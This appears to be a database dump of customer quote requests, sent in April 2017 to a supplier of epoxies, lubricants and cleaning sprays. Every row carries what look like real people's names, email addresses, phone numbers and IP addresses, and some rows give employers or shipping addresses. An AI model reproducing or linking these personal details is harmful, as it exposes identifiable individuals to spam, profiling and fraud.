INSERT INTO `wp_enquiry_detail_new` VALUES (814, 'Amy Anderson', 'amy.anderson@clyde-space.com', 'Hello,\n\nWould you be able to quote me for your MS-111 Epoxy Stripping Agent?\n\nAlso - are you aware of any customers using this agent for stripping of enamel coating on magnet wire?\n\nMany thanks,\n\nAmy', '+4401419464440', 'Quote', '212.250.79.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 07:57:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (815, 'Godwin', 'godwin.st@gmail.com', 'I am a researcher in Bangalore, India interested in testing Krytox 157FSL and potentially purchasing (~200 ml). I would like a quote on price.\n\nGodwin', '', 'Krytox', '158.144.176.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 10:40:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (816, 'DUANE DREW', 'duane.drew@bojakmanufacturing.com', 'Please quote for 1 tube( 8oz)\nworking temp 600-800 deg F\nlow speed', '613777-8399', 'cost and delivery', '66.102.69.246', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"675";s:5:"title";s:6:"XHT-BD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_361063190.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 14:22:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (817, 'Mark Solecki', 'soleckim@mdteam.com', 'I need about 500gms to run a test on. if I need to pay for it, please send me a quote.', '405557-3618', 'Looking for a test sample.', '68.109.253.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 15:59:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (818, 'Craig Rose', 'crose@foengineering.com', 'Hello, We purchased a couple of gallons before, but we need a quote for either 1 Qt or Gal of MS-477C\n\nThank You, Craig', '661257-8481', 'RFQ MS-477C', '74.87.239.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"637";s:5:"title";s:7:"MS-477C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-477C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 16:14:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (819, 'Sitanshu', 'shp15051993@gmail.com', 'I have following question \n1. Please let me know the price of the product \nalso the we are under tax exemption , so let us know if that could possible for you?\n2. Also we are in fort worth TX-760118, what will be the shipping cost?\n3. What is minimum quantity of purchase?', '682433-8661', 'PRICE', '129.107.3.193', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 18:31:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (820, 'Don Seames', 'dseames@gsoptics.com', 'Need current price &amp; availability for 0.5oz syringe', '585295-0221', 'RFQ ', '50.49.250.81', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"638";s:5:"title";s:5:"240AZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_300460277.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-18 18:56:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (821, 'Julita Smalc-Koziorowska', 'julita@unipress.waw.pl', 'I would like to ask for a quotation of two Syringes  2 oz. of GPL 206. \n', '+48228760451', '', '213.135.35.254', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-19 09:52:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (822, 'Michael Peterson ', 'michael.peterson@ga-asi.com', 'Need quote for 1 case of 12 cans ', '858312-4168', 'Price Quote ', '141.248.3.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-19 14:36:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (823, 'JACOBS TECHNOLOGY', 'jolie.hinojos-1@nasa.gov', 'GREASE,KRYTOX 240AC, qty of 10 tubes', '575524-5289', 'quote', '130.135.32.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-19 14:38:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (824, 'Nan', 'nannanii@outlook.com', 'ต้องการสอบถามราคาสินค้าค่ะ', '', 'ขอใบเสนอราคา epon 828', '180.183.142.112', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-19 15:49:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (825, 'Sue Davis', 'sdavis@raycomelec.com', 'Good Afternoon\nPlease quote price and lead time on MS-452N varnish.\nQty minimum purchase', '717292-3641', 'MS-452N Varnish', '173.163.165.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"622";s:5:"title";s:7:"MS-452N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-452N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-19 16:50:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (826, 'William Oldham', 'oldham@missionbio.com', 'Could you please provide pricing', '650892-0837', 'Pricing', '199.241.203.21', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-19 22:24:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (827, 'Paulina Alcayaga', 'palcayaga@carnegiescience.edu', 'Good morning. \n\nI need a quote of  AeroDuster® MS-222N please. \nThanks in advance. \n\nPaulina Aclayaga\nAdministrative Assistant\nLas Campanas Observatory\nLa Serena, Chile, Southamerica.\n', '', 'quote inquiry', '139.229.105.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-20 11:47:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (828, 'Sarah Kilmer', 'sarah.kilmer@supplycore.com', 'please provide a price quote for 4 gallons of the ReleaSys 8800. Thank you.', '815997-1686', 'Release Agent Quote', '12.175.2.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"290";s:5:"title";s:13:"ReleaSys 8800";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_314501645.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-20 12:55:51', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (829, 'Heber Green', 'green_heber@bah.com', 'Hello,\n\nJust looking for pricing on 1 quart of MS-111. \nThanks,\n-Heber Green', '', 'MS-111 RFQ', '208.185.193.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-20 14:59:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (830, 'Stephen Schulz', 'sschulz@gnubio.com', 'I spoke to a person regarding a sample of MS-122AD ~4/17. I would like to verify that got through the pipeline and you are not missing information. I did not receive an email confirmation.\nThanks very much', '978239-8400', 'Sample', '104.129.192.116', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-20 16:59:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (831, 'Samantha Goetz', 'sgoetz@draper.com', 'Hi, I would like to request a quote for a 5G quantity of Vertrel MS-760.\n\nThank you,\nSamantha Goetz', '617258-3524', 'Request for Quote', '192.80.95.230', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1708";s:5:"title";s:10:"MS-760/762";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-760.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-20 19:01:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (832, 'Shawn McElheny', 'shawn.a.mcelheny@lmco.com', 'I\'d like a quote for 2 cases of MS-222N.  \nThanks,\nShawn', '303971-5254', 'MS-222N', '192.31.106.35', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-21 11:41:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (833, 'Jennifer Hall', 'info@cmc-concrete.com', 'I am looking for pricing of Epon Resin 8021.', '724834-3551', 'Epon Resin 8021', '67.165.77.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"970";s:5:"title";s:12:"EPON™ 8021";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8021.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-21 14:57:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (834, 'Jason Lange', 'jason.lange@ndus.edu', 'I would like a quote and ordering information/shipping estimate on 2-1 gallon containers of EPON 828.  The shipping address would be:\n1735 Research Park Dr., NDSU\nFargo, ND 58102', '701388-0987', 'EPON 828', '134.129.74.14', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-21 16:09:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (835, 'Avi Gutman', 'avi.gutman@el-tan.co.il', 'Hi\n\nI would like to have quotation for\n4 X Epoxy 907\n\nThanks and Regards\n\nAvi Gutman CEO', '', 'Epoxy 907', '79.183.86.186', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:7:"7405551";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-23 11:42:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (836, 'Avi Gutman', 'avi0622@gmail.com', 'Hi\n\nPlease quot 4 X 907 epoxy\n\nThanks\n\nAvi', '818999-4193', '', '176.12.157.62', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 04:54:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (837, 'Irina Paluy', 'irinap@migal.org.il', 'Dear Sir/Madam,\nI represent group of scientists involved in research of photosynthesis. We need Krytox FSH as reagent for scientific research.  Please, provide me with quote for 0.5 and 1.0 kg of Krytox FSH157, term of supplying and shipping to Israel. \nThank you very much for prompt response.\nIrina Paluy\nMigal Research Institute\nmigal.org.il\n972-503963003\n', '1925-639-1437', 'Krytox FSH 157', '199.203.63.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 06:44:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (838, 'Dayer', 'camille.dayer@swissbiotechcenter.com', 'Dear Sir or Madam, \n\nWould it be possible to have a quotation for your product MS-122AD PTFE RElease AGent Dry lubricant?\n\nThank you very much\n\nBest regards, \n\nCamille Dayer', '+41244721905', 'Quotation', '46.140.156.254', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 09:07:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (839, 'charles glotzbach', 'charles.glotzbach@us.af.mil', 'Price quote for one can or a box of 12 if that is how it is sold.  My technicians in electronic maintenance are currently using the MS-242N quick freeze.  You would think that ANTI-STATIC would be paramount in their jobs.  ESD is a big concern.', '478222-5207', 'MS-242L-AS', '137.244.215.63', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2795";s:5:"title";s:41:"MS-242L-AS Quik-Freeze® Antistatic Ultra";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_377797663.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 11:34:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (840, 'Shlomo Zeitouni', 'sollyz3000@yahoo.com', 'Looking for 14 pcs same item we purchased last year for domestic use, company: Enterprise Hayat ', '646662-4551', 'EPIKURE 3125  1 kg bottle', '24.185.113.102', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1866";s:5:"title";s:15:"EPIKURE™ 3125";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3125.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 13:47:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (841, 'Kristen Dutra', 'kristen.dutra@temp-pro.com', 'Good Monring,\n\nPlease quote price and delivery on the smallest quantity - (pint?) of this product.\n\nThank you,\n\nKris Dutra\n', '413584-3165', 'Hexion EPON', '74.94.180.245', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 14:41:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (842, 'Barry Nicholson', 'barryn@generalstandards.com', 'Hi,\nWe would like to get a quote for your MS-470C Urethane Conformal Coating, in the 14oz spray,please.\n', '', 'Urethane Conformal Coating MS-470C', '162.199.110.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 15:09:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (843, 'Jeffrey d\\\'Eon', 'jeffrey@slipstechnologies.com', 'Hello, I am interested in getting both the pricing info and a sample of Suprion. I was wondering if this could be arranged. Thanks, Jeffrey d\'Eon', '617992-4835', 'Sample Inquiry ', '73.167.118.70', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1344";s:5:"title";s:7:"Suprion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-suprion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 17:44:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (844, 'Lou Tobin', 'LTobin@industrialprecision.com', 'Please send me a price quote. Thank you, Lou Tobin', '413642-2701', 'Price quote', '50.78.241.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 18:25:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (845, 'Dr Ziane', 'said.ziane@aero.bombardier.com', 'Can you please help. We have a difficult to release part from each other. The mold release MS143TE is sticky. Any expalnation for this trouble. Thank you in advance', '', 'Hard release parts by using MS143TE', '142.19.97.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 18:49:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (846, 'Rick Larson', 'rickl@med-gas.com', '2 oz tube', '303349-8061', 'need pricing ', '98.127.183.172', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"579";s:5:"title";s:5:"143AA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_204603724.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 19:24:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (847, 'Edward P Vasquez', 'edward.vasquez@skywest.com', 'Would like a quote on two tubes of Krytox 240AC for Crew Oxygen Mask Testing in our SkyWest Avionics shop.', '1559-346-1013', 'Krytox 240AC', '75.10.112.20', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 20:36:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (848, 'steve bliven', 'steve.bliven@thermofisher.com', 'Price and availability in 1 gal. quantity requested.\nThanks,\nSteve Bliven', '719445-5511', 'RFQ EPON 826', '198.22.92.40', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 21:23:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (849, 'Erick Oikawa', 'erickwill@gmail.com', 'Dear \nI would like the price for this product to be shipped to Brazil.\nPer what I could see you don\'t have a reseller here in Brazil and I am also interest into represent you here.\nThanks in advance\nErick', '', 'Inquiry from Brazil', '177.101.123.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-24 21:59:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (850, 'Seath Em', 'sem@ipgphotonics.com', 'Quote', '508506-2856', 'Flux removal', '162.211.109.182', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 13:56:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (851, 'Seath Em', 'sem@ipgphotonics.com', 'Quote\n', '508506-2856', 'Optical Duster 14oz Cans', '162.211.109.182', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 13:59:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (852, 'Arthur T Butler', 'atbutler3@verizon.net', 'Need some for home use only. Retired from my job...', '301440-6368', '', '96.241.162.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2800";s:5:"title";s:23:"MS-730L Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_486488371.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 14:43:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (853, 'Peter Heneghan', 'shipping@dssracing.com', 'Can we buy direct from you?', '630587-1169', 'Can we buy direct', '50.196.254.169', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:3:"107";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-04-25 15:08:55', '', NULL, '', '', '', NULL, '', ''); 
